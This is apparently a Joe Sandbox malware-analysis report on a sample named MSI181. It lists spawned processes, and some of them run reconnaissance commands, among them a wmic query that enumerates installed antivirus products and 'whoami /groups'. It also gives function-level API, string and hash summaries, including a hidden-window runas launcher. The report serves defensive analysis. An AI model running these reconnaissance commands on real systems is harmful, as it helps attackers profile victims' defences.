Wow64 process (32bit):	false
Commandline:	net config workstation
Imagebase:	0x7ff7243c0000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	23:19:04
Start date:	26/04/2024
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\net1 config workstation
Imagebase:	0x7ff7f5a10000
File size:	183'808 bytes
MD5 hash:	55693DF2BB3CBE2899DFDDF18B4EB8C9
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	23:19:04
Start date:	26/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Imagebase:	0x7ff7cd330000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	23:19:04
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	50
Start time:	23:19:04
Start date:	26/04/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Imagebase:	0x7ff716fe0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	51
Start time:	23:19:04
Start date:	26/04/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /V /B /C:displayName
Imagebase:	0x7ff610f70000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	52
Start time:	23:19:05
Start date:	26/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c whoami /groups
Imagebase:	0x7ff7cd330000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	31%
Total number of Nodes:	323
Total number of Limit Nodes:	7

Executed Functions

Function 005852F0 Relevance: 58.2, APIs: 16, Strings: 17, Instructions: 402
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 0058549C
GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 0058551D
ShellExecuteExW.SHELL32(?), ref: 00585601
ShellExecuteExW.SHELL32(?), ref: 00585637
GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 0058567C
GetProcAddress.KERNEL32(00000000), ref: 00585685
GetProcessId.KERNELBASE(?,?,?,?,?,?,?), ref: 00585688
AllowSetForegroundWindow.USER32(00000000), ref: 0058568B
GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 005856AB
GetProcAddress.KERNEL32(00000000), ref: 005856AE
GetProcessId.KERNELBASE(?,?,?,?,?,?,?), ref: 005856B5
Sleep.KERNELBASE(00000064,?,?,?,?,?,?), ref: 005856CA
EnumWindows.USER32(00585830,?), ref: 005856DF
BringWindowToTop.USER32(00000000), ref: 005856F4
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 00585711
GetExitCodeProcess.KERNELBASE(?,?), ref: 0058571B

Strings

Kernel32.dll, xrefs: 00585677, 005856A6
Window Visibility:, xrefs: 005855E3
Hidden, xrefs: 005855D6
.bat, xrefs: 00585422
open, xrefs: 005854D5
runas, xrefs: 005854EC
.cmd, xrefs: 0058545F
/C ""%s" %s", xrefs: 005854C1
%s\System32\cmd.exe, xrefs: 005854A9
ShellExecuteInfo members:, xrefs: 00585540
Directory:<, xrefs: 005855B2
GetProcessId, xrefs: 00585672, 005856A1
Parameters:<, xrefs: 005855C6
FilePath:<, xrefs: 00585589
<S], xrefs: 00585561
Verb:<, xrefs: 0058559E
Visible, xrefs: 005855DB, 005855EA

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ProcessWindow$AddressExecuteForegroundHandleModuleProcShellWindows$AllowBringCodeDirectoryEnumExitObjectSingleSleepWait
String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$<S]$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
API String ID: 2597324065-2468085203
Opcode ID: e0d5ea1e80bc5e8876bd7f53b165bfe13388d3a600919fab866c1210c164581d
Instruction ID: bfee768a908574a85cb75e7b18cfad59f0d668d34a6011de565f711d89709727
Opcode Fuzzy Hash: e0d5ea1e80bc5e8876bd7f53b165bfe13388d3a600919fab866c1210c164581d
Instruction Fuzzy Hash: C4E1A235A00A0A9BCF20EFA8C849BAEBBB5FF54710F544169EC15AB391F7349D45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00586A50 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 461
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00586AC8
OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00586AD5
CloseHandle.KERNEL32(00000000), ref: 00586AF5

Strings

S-1-5-18, xrefs: 00586B69

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpenToken
String ID: S-1-5-18
API String ID: 4052875653-4289277601
Opcode ID: 27960fbb85036d1269c434fd9d8a31cd6c0a27909db0f1ee85ef75df0a72ccf6
Instruction ID: a720b3fa66e083dd58164608ac74cf5fca735ea5c529630a421e594dfcb35a8c
Opcode Fuzzy Hash: 27960fbb85036d1269c434fd9d8a31cd6c0a27909db0f1ee85ef75df0a72ccf6
Instruction Fuzzy Hash: 82028E7490124A8FDF14EFA4C959BAEBFB5BF45314F148658EC02BB285EB309E05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 005857C0 Relevance: 6.0, APIs: 4, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000008,?,F302A5AA,?,-00000010), ref: 005857D0
OpenProcessToken.ADVAPI32(00000000), ref: 005857D7
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 0058580C
CloseHandle.KERNEL32(?), ref: 00585822

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: 237cd28582788ffe59087689124754fcab880455e02f48eed8272dd38ea46dd3
Instruction ID: 2737a60f8a3508d56b43877982be71d1c6eb16dc9a4d89b4bad36e198b6289f9
Opcode Fuzzy Hash: 237cd28582788ffe59087689124754fcab880455e02f48eed8272dd38ea46dd3
Instruction Fuzzy Hash: 32F03674148305AFE7109F10EC49B9A7BE8FB54700F508819FD94D2160E379951CEF63

Uniqueness

Uniqueness Score: -1.00%

Function 0058CDB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineW.KERNEL32(F302A5AA,?,?,?,?,?,?,?,?,?,005C56D5,000000FF), ref: 0058CDE8

Part of subcall function 00581F80: LocalAlloc.KERNEL32(00000040,00000000,?,?,vector too long,00584251,F302A5AA,00000000,?,00000000,?,?,?,005C4400,000000FF,?), ref: 00581F9D

ExitProcess.KERNEL32 ref: 0058CEB1

Part of subcall function 00586600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 0058667E

Strings

Full command line:, xrefs: 0058CE13

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: AllocCommandCreateExitFileLineLocalProcess
String ID: Full command line:
API String ID: 1878577176-831861440
Opcode ID: 0cc17bb01cde81f1bede7b908bb191d78036050a1ea4144d29b6f2831506a06d
Instruction ID: 9b3aab3e94593f95852e7e2f2faca92ef364864ba25b091dc85f41bb57495d63
Opcode Fuzzy Hash: 0cc17bb01cde81f1bede7b908bb191d78036050a1ea4144d29b6f2831506a06d
Instruction Fuzzy Hash: A921D331A101159BCB15FB60DC49BAE7FA5BF94740F144519F802B7292EF345A08CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00585E40 Relevance: 4.6, APIs: 3, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00585E18,F302A5AA,?), ref: 00585EB4
GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00585E18,F302A5AA,?), ref: 00585EBE
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00585E18,F302A5AA,?), ref: 00585F1A

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: InformationToken$ErrorLast
String ID:
API String ID: 2567405617-0
Opcode ID: dc168101896fb9fa7e32233e9e4ba8929bb3b1c9545317513c52ef1cd59ef8f7
Instruction ID: 1b0f302956dd1283924f1aeba1310193fe8c3619003c2213bad0258901f0d6bd
Opcode Fuzzy Hash: dc168101896fb9fa7e32233e9e4ba8929bb3b1c9545317513c52ef1cd59ef8f7
Instruction Fuzzy Hash: 8F315EB1A006099FD724DF99CC49BAFBFF9FB44710F10452EE515A7280E7B569048FA0

Uniqueness

Uniqueness Score: -1.00%

Function 005B70BB Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,005B596A,00000001,00000364,?,00000006,000000FF,?,005A6CE7,00000000,A8[,00000000), ref: 005B70FC

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 794a564f05a41fd9d52ee5fa84fb446dba68a8ee88a434a5e4ea9be1061a597c
Instruction ID: 364d13121dac92325715452c9c56ee24e4c4ce835e4a960fa47db9e73d4aad4c
Opcode Fuzzy Hash: 794a564f05a41fd9d52ee5fa84fb446dba68a8ee88a434a5e4ea9be1061a597c
Instruction Fuzzy Hash: 07F0B43160D62D6A9B226A259C0ABEA7F49FBD9770B154012FD24AA190CA60FD00CAF1

Uniqueness

Uniqueness Score: -1.00%

Function 00585940 Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(?,F302A5AA,00000000,?,?,?), ref: 00585982

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 0de4709cfa4557b9be3af3bd6e62523d201c404d95dc1fa648b2c0e79b61e905
Instruction ID: 1ebe4c037d184b4985fc4f87c0d72ab8121ff650be45d8442e7eb0b5bdac178a
Opcode Fuzzy Hash: 0de4709cfa4557b9be3af3bd6e62523d201c404d95dc1fa648b2c0e79b61e905
Instruction Fuzzy Hash: 0BF0CD71A04A48EFC710DF99D945F5AFBF8FB06720F1042AAE821D3690D336A904CB90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00584BA0 Relevance: 33.5, APIs: 22, Instructions: 502comCOMMON

Download Yara Rule

APIs

Part of subcall function 005857C0: GetCurrentProcess.KERNEL32(00000008,?,F302A5AA,?,-00000010), ref: 005857D0
Part of subcall function 005857C0: OpenProcessToken.ADVAPI32(00000000), ref: 005857D7

CoInitialize.OLE32(00000000), ref: 00584C15
CoCreateInstance.OLE32(005C72B0,00000000,00000004,005D5104,00000000,?), ref: 00584C45
CoUninitialize.OLE32 ref: 00585187
_com_issue_error.COMSUPP ref: 005851B5

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
String ID:
API String ID: 928366108-0
Opcode ID: 9c8f33e3adcc1198480c5db1491b38ec0d95f3dcfc6cc72b91804b618faff638
Instruction ID: ef5ecff9b531f3fb8bf50a9fced1ef7a931ed5b99ccea7f7d35667b4658492b5
Opcode Fuzzy Hash: 9c8f33e3adcc1198480c5db1491b38ec0d95f3dcfc6cc72b91804b618faff638
Instruction Fuzzy Hash: 0C228C70A04288DFEB11DBA8C848BADBFB8BF55304F148199E845FB281E7759A49CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0058C870 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 366registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 0058CBB6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,005DE6D0,00000800), ref: 0058CBD3

Strings

/RunAsAdmin , xrefs: 0058C92B, 0058C94C, 0058C951
/DontWait , xrefs: 0058C8D8, 0058C8EE, 0058C8F3
/DIR , xrefs: 0058C9F3
/EnforcedRunAsAdmin , xrefs: 0058C893, 0058C8A3, 0058C8A8
/HideWindow, xrefs: 0058C98E, 0058C9AC, 0058C9B1
/LogFile, xrefs: 0058CA07

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: OpenQueryValue
String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
API String ID: 4153817207-482544602
Opcode ID: 5956c68919403263ddc23e9508387b1d4e3e1a17e7a2ebe59c07550db28e0b48
Instruction ID: 0d5b025999cf80a1d5358d1417d1c8d9e09bfe61e620261e761c38e9ccee3480
Opcode Fuzzy Hash: 5956c68919403263ddc23e9508387b1d4e3e1a17e7a2ebe59c07550db28e0b48
Instruction Fuzzy Hash: 69C1C2356042168ACB35BF18D84167A7FE1FF91740F98849AEC9ABB251F770DD82C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00583860 Relevance: 10.7, APIs: 7, Instructions: 227processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005838CB
CloseHandle.KERNEL32(00000000), ref: 0058390B
Process32FirstW.KERNEL32(?,00000000), ref: 0058395F
OpenProcess.KERNEL32(00000410,00000000,?), ref: 0058397A
CloseHandle.KERNEL32(00000000), ref: 00583A8E
Process32NextW.KERNEL32(?,00000000), ref: 00583AA2
CloseHandle.KERNEL32(?), ref: 00583AF0

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 708755948-0
Opcode ID: 1f375eda6a8e7acdc9f76681906c832f242b3061230aa003849ec9beb528ed5d
Instruction ID: e96205175373403df3a10ea528ab47c0bcb1662287e4d6fedd933393b98de1e8
Opcode Fuzzy Hash: 1f375eda6a8e7acdc9f76681906c832f242b3061230aa003849ec9beb528ed5d
Instruction Fuzzy Hash: D4A1F6B0901249DFDB10DFA8D988BDEBFF8BF48704F14815AE815AB290D7B45A44CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 005BF032 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 005BF216

Strings

1#QNAN, xrefs: 005BF145
1#IND, xrefs: 005BF137
1#SNAN, xrefs: 005BF13E
1#INF, xrefs: 005BF168

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 0eaa60cc6f8c59ea7d07f3e0159a2575a672408c6980cbc26cd76ff286c5a47a
Instruction ID: ea7f86cd47139efcdcbe44f1fcd29fe05efe338733ca49a296e947c615f3f16b
Opcode Fuzzy Hash: 0eaa60cc6f8c59ea7d07f3e0159a2575a672408c6980cbc26cd76ff286c5a47a
Instruction Fuzzy Hash: EBD22971E082298FDB65CE68DD44BEABBB5FB45304F1445EAD80DE7240EB74AE818F41

Uniqueness

Uniqueness Score: -1.00%

Function 005BE5B3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,005BE8D1,00000002,00000000,?,?,?,005BE8D1,?,00000000), ref: 005BE64C
GetLocaleInfoW.KERNEL32(?,20001004,005BE8D1,00000002,00000000,?,?,?,005BE8D1,?,00000000), ref: 005BE675
GetACP.KERNEL32(?,?,005BE8D1,?,00000000), ref: 005BE68A

Strings

ACP, xrefs: 005BE5D1
OCP, xrefs: 005BE607

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: c7759d9785d88b93cc5aae564639c2d88d6dfbb25630c8aa64102fc00c64e848
Instruction ID: 1a75ac661450e5bb2fa1c448526d583622659e8e9c917699aa7fdfb6155167cc
Opcode Fuzzy Hash: c7759d9785d88b93cc5aae564639c2d88d6dfbb25630c8aa64102fc00c64e848
Instruction Fuzzy Hash: B721A132A00104AADB348F14E906FDB7FA6FB78B64B5E8864E90ADB110E732FD41C750

Uniqueness

Uniqueness Score: -1.00%

Function 00589CC0 Relevance: 7.9, APIs: 5, Instructions: 441COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00589E60
LocalFree.KERNEL32(00000000), ref: 00589EB7
_swprintf.LIBCMT ref: 0058A0A0
LocalFree.KERNEL32(00000000), ref: 0058A0F7
_swprintf.LIBCMT ref: 0058A183

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: _swprintf$FreeLocal
String ID:
API String ID: 2429749586-0
Opcode ID: 0bef3ce3b8884ab7d175d3eca43de5595b0da38859e3f707eed93936481d427c
Instruction ID: 3a971215fc2cf718cc6d839ac30276173ee1ed020a259ce647285352aa452026
Opcode Fuzzy Hash: 0bef3ce3b8884ab7d175d3eca43de5595b0da38859e3f707eed93936481d427c
Instruction Fuzzy Hash: A9F19B71D00219ABDF15EFA8DC44BAEBBB9FF49300F14422AF911B7281E735A941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 005BE788 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005B57CC: GetLastError.KERNEL32(?,00000008,005BAD4C,?,?,?,?,00000000,?,?), ref: 005B57D0
Part of subcall function 005B57CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 005B5872

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 005BE894
IsValidCodePage.KERNEL32(00000000), ref: 005BE8DD
IsValidLocale.KERNEL32(?,00000001), ref: 005BE8EC
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 005BE934
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 005BE953

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 34089c885299990c1a8fc8f81b1cd669aefd04360b989e9cf0a7470caaa16335
Instruction ID: 81c6c68f8c49a444f401e9316c103ab39a48c8f3894f6343fc55ccd69f8867d4
Opcode Fuzzy Hash: 34089c885299990c1a8fc8f81b1cd669aefd04360b989e9cf0a7470caaa16335
Instruction Fuzzy Hash: B1516272A0060A9FEB20DFA5DC46AFE7BB8FF59701F184469F510E7190DB70A904CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00582310 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 005A2C98: EnterCriticalSection.KERNEL32(005DDD3C,?,?,?,005823B6,005DE638,F302A5AA,?,?,005C3D6D,000000FF), ref: 005A2CA3
Part of subcall function 005A2C98: LeaveCriticalSection.KERNEL32(005DDD3C,?,?,?,005823B6,005DE638,F302A5AA,?,?,005C3D6D,000000FF), ref: 005A2CE0

GetProcessHeap.KERNEL32 ref: 00582365

Part of subcall function 005A2C4E: EnterCriticalSection.KERNEL32(005DDD3C,?,?,00582427,005DE638,005C6B40), ref: 005A2C58
Part of subcall function 005A2C4E: LeaveCriticalSection.KERNEL32(005DDD3C,?,?,00582427,005DE638,005C6B40), ref: 005A2C8B
Part of subcall function 005A2C4E: RtlWakeAllConditionVariable.NTDLL ref: 005A2D02

